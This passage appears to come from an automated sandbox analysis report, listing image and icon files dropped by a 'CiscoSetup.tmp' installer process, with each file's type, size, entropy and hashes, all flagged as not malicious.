                                                                                                                                      SHA-256:EF07FC7A9E194C9F076CF86C65E292816AAF666C00400A0BE8F70FB7740E902B
                                                                                                                                      SHA-512:ADE99880BB1B1A1FE3ED348AD625D6301FE8631E594E1CCBBE8678245F5B1EE2BBF93BEF7101698CF909E93CD4BBF005DD20466D3A278A9CACE91B324A23A48B
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12258
                                                                                                                                      Entropy (8bit):7.976396258951981
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:Fkocto5a0L5W0WyUW8l4JGfcRWyryRN77YK/CPEyei5rTiKb9bdgih7OnT:Fkocto5zW0dNaAfRxKK80dbd5hanT
                                                                                                                                      MD5:33B3721B931071C69A9ECDFDAEF39F29
                                                                                                                                      SHA1:EE4DD7077CFDA9C0A2FE594CE8C9496EF23CA2E3
                                                                                                                                      SHA-256:55FC14B826D7F3C9F47F14CDBDAE488F1D4FE3678CD95BBBF7E643436F382D37
                                                                                                                                      SHA-512:B8E1843F2F08ADF93F7277FFAF8DD5299F7F5FCFA38AD15EC54422D4E3048822E15BB9D0B682D1728B6E4064CAE32222998ED48D41310FE7D9C58116D6D9E108
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8950
                                                                                                                                      Entropy (8bit):7.969730039207073
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:p96ObyGv4LCovtazAkU/bm8oT+4UObs9KhHU1gL3c2/Rqw:tbtuCovtazCDdxObJ5UM3hh
                                                                                                                                      MD5:4F8EBA018E164B7A5FFDA205576989E8
                                                                                                                                      SHA1:56669FFFC614C2577370B0EF84EA6EA4FFE89858
                                                                                                                                      SHA-256:815EACDBC62FED323EB3D0BBAD4596C0D699862A66258A4F994B78CE520389A1
                                                                                                                                      SHA-512:F9CBDEE29FD372DEA72C6039E705A192B2C751927490B811317CE74A56DBEF1B4C17D05D1CC29A32F060C6A761D93CDB5D2AF6C76853427F5341D7C6DA4F44E7
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12436
                                                                                                                                      Entropy (8bit):7.977312501768235
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:9duiLviw1Tg2WOFeuMhEhKPewOSJKVBpFGo5cJUs1P3X3cI78saDjy6Z7KiasZM1:7vJ0OYhbPWEKLaoe9dXsI789HZTla
                                                                                                                                      MD5:3F1083A6458C2CC3E9743D03ACB0D349
                                                                                                                                      SHA1:280DA65E961DAC251D6394A234E92FB110DBC998
                                                                                                                                      SHA-256:78A87D7B4CDA2E04CF4A608C78CE627450E15CD75AE121B4D72466837197D096
                                                                                                                                      SHA-512:250604CE42BD866B870A50B01E892036364DBBBEA1AC58EF60B3E4E38513A9DADE3987459FBD83681435D74521B368550DFE329E70CDD84837BAFCD2E43B53A2
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12780
                                                                                                                                      Entropy (8bit):7.975972884511595
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:eS01CYt7F9/5i2XPFK02VBVDNP/RqOMGkw9j:e1th95PqjP/E1A
                                                                                                                                      MD5:1CE2626120CD6B69683255C71552896B
                                                                                                                                      SHA1:4230DF12A00E6B13CAB39EFB1C44DCBF5B656087
                                                                                                                                      SHA-256:B55ABBF6754B131C33947DCA3511D219B2AB2DC5D7E8945BF3C6A2E9FB0FEB23
                                                                                                                                      SHA-512:A197A76FB7DB9FEF68E3A49DE4C134EFB41472773F323BF4F8AB3B610174FD75C15848BB42CFC2D4240D72EFA66FF4CFFE02DDA28323279C87C7019E167F724B
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):9482
                                                                                                                                      Entropy (8bit):7.969513879342907
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:LXNXFLy+vMbgQbCoVANBzT84c2blwwjla7:rNX5ggQOoVIzwHwxA
                                                                                                                                      MD5:21841588532E34397E478E791A064F2C
                                                                                                                                      SHA1:90C0BEAC3D3A1288FB7BED658835BB6710E67922
                                                                                                                                      SHA-256:9D0F626E21D3324BE7CB473D44514737D9A9145B86E73F67EBFD6DE308B36FCC
                                                                                                                                      SHA-512:B0006DD98C201AD06F79166FD53F67C61C60C48C1506153EA47AB7F38A7D4F6CCACDF9E369AC0EFAD36B396786EDFD1FBEF8302D1F2B1F82BE6D784936ED6CB0
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):11747
                                                                                                                                      Entropy (8bit):7.9792800328394184
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:6O6eUrSbvYvQ77S7PmrQJhWxQLVBinCEBWLp41ZvPaiTlShB9R022uRx1ohfiq:67RSbAvQyCED4QLVBiCLLS1hhMv022u6
                                                                                                                                      MD5:49E51BACF675B9DF74CD84F600645F0F
                                                                                                                                      SHA1:563FBED61D83375EE51DD85FD7DC71B53D048ADF
                                                                                                                                      SHA-256:25EA8BC480B6E97548BD3F64ED6128686C06CAFAA772025B24C2F52CE39B137A
                                                                                                                                      SHA-512:3231ED2D95E3B2DD1AF2956D3FB29EC7D6AC2D8A5FA6CF12DDA967BCA25CBB3D69B393265B38592B8DB62CC93D55903BE827BD5AC5E119DB5D80E2CE54DDA084
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12124
                                                                                                                                      Entropy (8bit):7.978101118980993
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:6QcIfCBldrUhS+mzFAXOk03y4nRFoVKX22ZSsnVqzY5oarRl75w1/i5IxehvNbim:6QcRBld2S+m5AOTRaI22ZSgVq053t5ww
                                                                                                                                      MD5:5B846635AC3DA9C8E857C042ED0EA2F6
                                                                                                                                      SHA1:B439FC64436B74900F453ED2480C8CA547CBCDCC
                                                                                                                                      SHA-256:9C6135A6176AC9D00E1BD4307A3111BBECD39814DB18212DA1D55916A4EEDB4F
                                                                                                                                      SHA-512:0A58ED5105CFB87DD3F91675734171989C0A36B572BA2D20706CC831E0DAD9DB37175754E405680B4DEE4D6D958DA63B89413E2B6D2725A84C95932F8D123323
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8594
                                                                                                                                      Entropy (8bit):7.973082494080156
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:IhgOYUbtU91yZQm0IZ5GE1njVNMooVREvukNGEsuiaoYOyF40:IhaUpU91ScIZ5PjVNaREvpjiao4+0
                                                                                                                                      MD5:D1F876BC1C789A4108570185251B864E
                                                                                                                                      SHA1:9F91D3B837191A9499CD2959EC1802CF444D78AE
                                                                                                                                      SHA-256:DF137D0086B1A5DC1A0508643AB8DBE66A0A268A2A5E7A539EDF39F6957AF1AB
                                                                                                                                      SHA-512:4E1D5AE2D6539B38EDEFEC017B41DD50D7EA41AEF9B6783538D8D19D9C14E2D9411D2DF86AC672BD6B171A507F77EF2D4976003206DC4624687BA4588BAA6688
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4117
                                                                                                                                      Entropy (8bit):7.943813748161345
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:79m160UrZetyDZrcRzRB+6nB49EkDPzkWb9PhkqjhqBx1DNo:79G6xr6yVrkzRB+UkEWb9pji1DNo
                                                                                                                                      MD5:04127248AAA5B7D32DC2DE4F02DA025F
                                                                                                                                      SHA1:6509E437F6503A9975953B955054D29ACE439D5F
                                                                                                                                      SHA-256:946B8C23BF05558B52D273502A65731A5E412C9E02A544748C5E5C27A3ED6D0D
                                                                                                                                      SHA-512:F26907895DAAEEE025FB20BCD22803F1151A5D5037B85FF1DCD71DA98E78C417996C08759F646D8E463FB6DD43A36F10092746D6520F9C70BE4AC03AF3B5F48A
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4267
                                                                                                                                      Entropy (8bit):7.94257084168463
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:IqGbLvTlphRGJSqAeFg590km/kqzrxsoCeaV6XjNfUmhPRD3el9:ILhKFZa0PCPiNfU2RCL
                                                                                                                                      MD5:7014A8C17D7E8E5A2BEDB4C4E0C12E80
                                                                                                                                      SHA1:28881EE38814E155FA7B1E0096801A644CAB6548
                                                                                                                                      SHA-256:BD9514FA182DE90450B6E6E3EEDB2E084CD1390D5B6FDF0509B81EC36B963147
                                                                                                                                      SHA-512:B2B94E806A4F1F8BACAA2870944C75952A9C9F0577AF6571BFF65038DCD242AF5B887E400430E8E8B0B8E8BD2BA7A7318247581304C668662A7A6A255F142A12
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4052
                                                                                                                                      Entropy (8bit):7.943954771539964
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:YVzyamWl9ZWA1xj7kdJwie8o1NqPw1AT2Z1OHXe:q5t9ZWmlsy9qPw1AT2Z2e
                                                                                                                                      MD5:0356D0A27BC2E9B55F5603D0373CED4C
                                                                                                                                      SHA1:7572FB4DC3B1CEF66F38F68A29093D3FBE706A5E
                                                                                                                                      SHA-256:E5427AAA99BFC3CC3886351EC9B7C4C524799CF4A0DE0E0CF6D8DE3C0DFB8743
                                                                                                                                      SHA-512:6BB3E1168712BCAE7F5B67F92A60B58B74162A01225AE264B0A72CDC2CE0C3943A7E9AE47406AFBAE44C25870A877C5EE83142C40EE4BFA6C57DEC495B1C53BE
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 375 x 23, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):700
                                                                                                                                      Entropy (8bit):6.305816801627044
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7B0J+UJbp92cDPuY1qHlnv/pebLaeb9Lf43DQ6TjpuIXG13DQ6i5t2c:0erLYWuqylnv/pe3aO9KDUIXO3D+/
                                                                                                                                      MD5:894AB8F4298F2238292E31BAB5CCAB10
                                                                                                                                      SHA1:FCFC29B4E5BAC3C59EDA1F8837087E768F7B0A7B
                                                                                                                                      SHA-256:7C8B5EC8C7DE5405AAEE5B1E92C605020424AED8AF830C2429ED47883561A39D
                                                                                                                                      SHA-512:B7F06E961C2C2BAC0EFC5633E213D90E3206093593988BD04CE84DA13B1D1B4F0B83DEB77FF247E6681A645004FD37C2866FF83EB7A6A5E3E581B0868AB58C3E
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2106
                                                                                                                                      Entropy (8bit):7.848629133083243
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:gySVFiuSZgKTkBsSS/Z89Vn1MM1DCINukyd5Wb:gySBSZCqBhen1MM1CINgsb
                                                                                                                                      MD5:85D427479A5F8E6F69DEB0A5EC7E6DBF
                                                                                                                                      SHA1:95414451D6AE9B130831A1C297151F65AD849A6C
                                                                                                                                      SHA-256:CF8B60054D290DFA6BA59086BF18F5ED0718C721B4ADD200AC95275E5457AB58
                                                                                                                                      SHA-512:58248F232F27441ACB81B0A6AF2272D19EE1710101C3675CCAEA4BA3CE8A74D664053C58EF2D9C948F2ABCCA4F30B5ACF633A2EA53C8E260BB40FA6F1214151C
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):478
                                                                                                                                      Entropy (8bit):7.3703130572324955
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7xE0NSVUvFAccOOfACD09VvVupRqR5/MXMmxHlWX:YY+vFr+cvV8w3MXMm+
                                                                                                                                      MD5:D3BD002D9E657FC264347FE2FE45EE8D
                                                                                                                                      SHA1:8EC6528F2E8A07036C5D5F439FA0438C99CE814E
                                                                                                                                      SHA-256:B17D8F8BC1B971962A798743630816DFEF50526A2692BB458A7B1B6A546D28B0
                                                                                                                                      SHA-512:3BF535A63BCE729ABD443CA4265147DB46DFF698BC2AA27C7FFE430527F7C4FD921AFFBD6E789BC00EAC4DFFE300E82488A8C4886DC9D629DCA6B5CF905C0624
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2245
                                                                                                                                      Entropy (8bit):7.881067272381913
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:RTfEfdH62oMLD03CqIngSp9wZM/vgRzmD0XQ8/CvbJkfG2:RwfYHt6qKmzmD0g8/Cv9kfG2
                                                                                                                                      MD5:FC4A9201524066297A4C6DD0760D646C
                                                                                                                                      SHA1:7B6B7710A1B9EEDAC515FEEE90728A405AC07937
                                                                                                                                      SHA-256:B19294D4FF3378820B91BF8D2DBC53CB9C8BB531A5CA7E0F4C728AC757C0CD29
                                                                                                                                      SHA-512:2597C04C2740000747731CB3FF55E7C15675D86578CD0FC73A8F04D84CD084142BF0BFAE55DD81B6AFA1CDE2585EEF233B9BBAB1C05655B3099FA1BBFAECD3DD
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):543
                                                                                                                                      Entropy (8bit):7.547901309478316
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7CWdT8JNBxFtHpTJKAghnooED91TFxff+Tye5N3Q2+ah7:KT8rBztJYnCjT3+TN5N1B7
                                                                                                                                      MD5:5D99349B36EE267BD85E3A4E4C8B9D09
                                                                                                                                      SHA1:AF5F88451BA51F5FBAE5D3D603655138EE78D27F
                                                                                                                                      SHA-256:84EF9A5D991E3B3E68AD6F7B8F2D9F279769DC9D27BBB205C3AB9B2BC1607ACA
                                                                                                                                      SHA-512:58C4E4CDD9B7D5C660A40467F504137D1779222AF24DAFFABB495DBD476A65940E93EF7E8EE7F9BF69A4C4F560D6BA5FB4EEC4DE81C77E4383A24D7B0110DA85
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1702
                                                                                                                                      Entropy (8bit):7.836409910643584
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:MSsuOJ3aklIveNn3uRjOIi4d6R2LA+KdrIF0Nl3BqL7goSlO2Ywdq8XLxTGO:MD35lIvmnsT8gA+GsFvkoSVdxl
                                                                                                                                      MD5:2A93A2F714FAB48B6CD5BDF1533EEFE2
                                                                                                                                      SHA1:727D59B41389E63AD6149117E83035CE8DECD59D
                                                                                                                                      SHA-256:7982204EE803716D70B99C224A4A1F3AA10CA0AC012CF33802A3E305B72AB8AF
                                                                                                                                      SHA-512:B4F04174C5B0691F65C4304B5EFC23C5533FF72092F15C03EDBBFBA103158C79FD0F890A7509EF84D85CD662AA849525FDAE1BE9D91016214BF5B1262EA735B3
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):417
                                                                                                                                      Entropy (8bit):7.261808950496785
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7ye/67M2KK09AtPNFPQM7vcvei4A62GCv+OQRWqxEz:de/YM2KYBTcKA62VWvE
                                                                                                                                      MD5:E49813F0A990FD98318710C0F0BFDA21
                                                                                                                                      SHA1:FD09D47A8BA649393221D5048D3BFF1FFADD3496
                                                                                                                                      SHA-256:79C957FB0133496B0266E8F5441982D3F1DAB781B90FBC34F59D75968577CD61
                                                                                                                                      SHA-512:8883387871CBE8B3778F5D95A95700D99B7D4737696051436C06060C645F83E25255A76AA73CD5BA1B03FC5797D8F6B99D1B0E489B5421D26D4E7DBFD358EA65
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1856
                                                                                                                                      Entropy (8bit):7.845521158056495
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:M5K2A2T3d0z5uOpdNSaQfbDS3YsPWaU3SjmUjm42rh:Mg2A9z5Fp1W3otPW5p
                                                                                                                                      MD5:AFAF04A11862845AFC31D64F7762D28E
                                                                                                                                      SHA1:C5E99C3DC321086738CB7BCF13EFF55EBDF1D3CF
                                                                                                                                      SHA-256:6797601AA69F2B489ADAB85A6DA73E78D4E041D24598BC726A3E837D2BE2D75E
                                                                                                                                      SHA-512:3D463D3EA19E87E8B592974BF4B69F4F6F5DE08975BB04AB0C180AE7CC49C9866E7B40F2D5890E50E7BF0FE2F8830125335FECB7C4FED8F2AF6045F8E66E18B4
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):472
                                                                                                                                      Entropy (8bit):7.339402871750466
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7IEzFffWxjBiqsoNKXcQjmUVQtaaHI:hI0RBiqJycQjmU6t9HI
                                                                                                                                      MD5:AE59E69F9BB8D40D28E2C195A5F131BD
                                                                                                                                      SHA1:1AC9ED0DD66CEFA5F515A8C0D51A3E26B7F2F6A9
                                                                                                                                      SHA-256:271F2C4002F0127CD049A9BEEED8474FACED3217E7BB0C6DDEB8B34F8536FA8E
                                                                                                                                      SHA-512:D69C0C2F7C190D1795A5C6455949C0B7F63D678785C170D8DB4A7D3FF88A048D954C8236E750D2F38CAD6CED9072DA7E8E3B5B384465074637D43390D9857C26
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.5904244181066343
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:qp/EF2cJeBcktRYgD9qsSyGrnPblkbGgmo:YccB8lPbGHB
                                                                                                                                      MD5:A1C46D32AA7BCD14A8DB10005E23B885
                                                                                                                                      SHA1:8859CD29B7D6A9D645C3B09D8AFAB041D3BB7A37
                                                                                                                                      SHA-256:66DAAB72327F0E98FC3006DA7B0F957901285993388BDE25D6149464A98C9442
                                                                                                                                      SHA-512:16CC5F81EC30BC027D6C3268383463968DD9E2C0A0A3BBDA8059BF8DC6A99853ED27CD1E1BD955ACF2F98B5B0693D5A2AEDCC69261F2E06B065ED11684179AD9
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.612237043911612
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:SPEyydQzC5enoYfFMdIDhjdmrEEN4kbGg2o:SFS5eno4FMyADNHx
                                                                                                                                      MD5:CAE552335F760EE1FF87D686F972BEB8
                                                                                                                                      SHA1:676A5070DDD6218C274FE01608754D06E735558A
                                                                                                                                      SHA-256:615057C1B8C472DDF3D6B48284DB764F3F4FE8A159FD479B96C401D0BEE82674
                                                                                                                                      SHA-512:876B7077A8DF9C900BCF1CF8D5AF98A3B84A7D31412DEE05CAF76ACA215B771EFD5CD5E8225175E822BCE24239A57F841D1DDF633B3C68599D0C401AA98BBDF9
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.4144936482461397
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:xLEWi6fEolR+vy+f7I8QbmvTn+3vCpK+hxZBBBpkbGgo2uo:xLV7EolbUISLn+3UBZBBBpkbGg6o
                                                                                                                                      MD5:68A2EA89135A31CE9E3E598F981433E0
                                                                                                                                      SHA1:1E2DABDFE730EAFD9A21F09C0E8E7F84E159E115
                                                                                                                                      SHA-256:73A199B9058AE8665DE3AD7792A7EE5DF7ADD2A4F2D8EFF49D81F221E8AFF85E
                                                                                                                                      SHA-512:CBCF48A63EA4CDC853950D2240B216EC8037E5CF0DFA9DA590C9F3749D5090406CA00CFCC5F844A7024ADD80B113F49F2F7D7F3D739F813360DA47720418DAC2
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):11585
                                                                                                                                      Entropy (8bit):7.961332304899258
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:uoknxnFWLkyZS1HwgrTfSTVQV1r+2HPOSm9HRNxe6S1ipOvyYh95kRwjtbul4Ljh:uo4xAoKoHuVuHPOSmdfxy1ipwN5bjtbB
                                                                                                                                      MD5:FAA694AA17D61EAC6803E15397AE2C15
                                                                                                                                      SHA1:D3FBA06AA2794D460DEF2997E84EC7CBE49A83AB
                                                                                                                                      SHA-256:9AC4F60BF1A10CD08529427AAA1C419F5C4C1412D23EE5764B9EDACC3558A980
                                                                                                                                      SHA-512:5B2586AC90E5366C236AE02181172842CFDC311495157477ACB388A50CA56B5FB1EE532B753323566937012A54027DC53DE803DB4178F6F85618ADA4B015308C
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2465
                                                                                                                                      Entropy (8bit):7.9078675566370515
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:OSjMqJt67atsaB2Q95MFMQQYs/7uI2/D8:OSd+7OsTQTuQYszIb8
                                                                                                                                      MD5:161092451DAE50221183377F7CFB560E
                                                                                                                                      SHA1:2884EE1CAD503614512FAF274C3E0AC209F9201B
                                                                                                                                      SHA-256:8CB267EF7B475567CF0A347A4E99CC533102789A966B7285A7733FD8E4FBDE47
                                                                                                                                      SHA-512:0BD327894C7A1AFC5AF1B3CD1D678370C568DF1A06A32408B4A4A3047A846657EDC09A1A0E094565EF4004DF6FEE3FBF0A2885FE0279F4920CB91FBE1D897B14
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3638
                                                                                                                                      Entropy (8bit):7.889316799889741
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTH6gOjEda8+nWKHD:TSDS0tKg9E05THXOodrpKHD
                                                                                                                                      MD5:ADDC960D6A70987420055E0DEBCF4250
                                                                                                                                      SHA1:AF1D0C9386C1ADC774FC167F69B89637F414BED9
                                                                                                                                      SHA-256:B19F731C03166DB50BA5E0F0AD70A48E1223E7DD57B051A3DFB8CC23FBFAB482
                                                                                                                                      SHA-512:8F6D2CFA6BF8406CB2954029C0A43F3871C2C35E19CC0580925D4E847BFC6377749AB2A3FBF8CA030D55AEC3729AED6F54F7D7534A593A24927C8E274A811E1D
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4370
                                                                                                                                      Entropy (8bit):7.900909498577029
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTcm/smdB4cT3NGDBWPryd:TSDS0tKg9E05Tcm/smAkMEPed
                                                                                                                                      MD5:CE71A3CEA2599D3A31ACAA9B55CA11E7
                                                                                                                                      SHA1:0592CF53E554F95BC722A21AF3CC9DF896BB6108
                                                                                                                                      SHA-256:0E0CF343355B77AA93DC0AFA9AFF96FF64EF5DFE73E9AAB57ECAA776BEC7EE7A
                                                                                                                                      SHA-512:D04AF6ED7247BCF61C969C1668A0F8F62CBA4A83E08CCFAE63755F56A4F6D49F9B1E39FABB10A3C04675828379658AE8FE414AC7682F7211C4A5F8949224E7EF
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5558
                                                                                                                                      Entropy (8bit):4.450533821817726
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:vcn7ngbW2IU8R9Lq+LhfSnuX31xEqxpkg:E74IU8R9LqMTFxz
                                                                                                                                      MD5:EAF0F00DA8BB1D384B8A5BB3B82D0A54
                                                                                                                                      SHA1:2E7021D20D962F4568A51757B2D9B7408624740E
                                                                                                                                      SHA-256:86D5102E01D6D29D5AEE6E87E827B8C624D7B552035C9AFDB0BE2B120E4A553F
                                                                                                                                      SHA-512:57358DEA1B8A75A8FEEE29F9D83931D65672B228B93CE6C9CFEEBA3C77FD9FDB8D7B7D4A1F3188D8CBC2FEBF8B427F574791E6210580499788FF101641C01854
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):9736
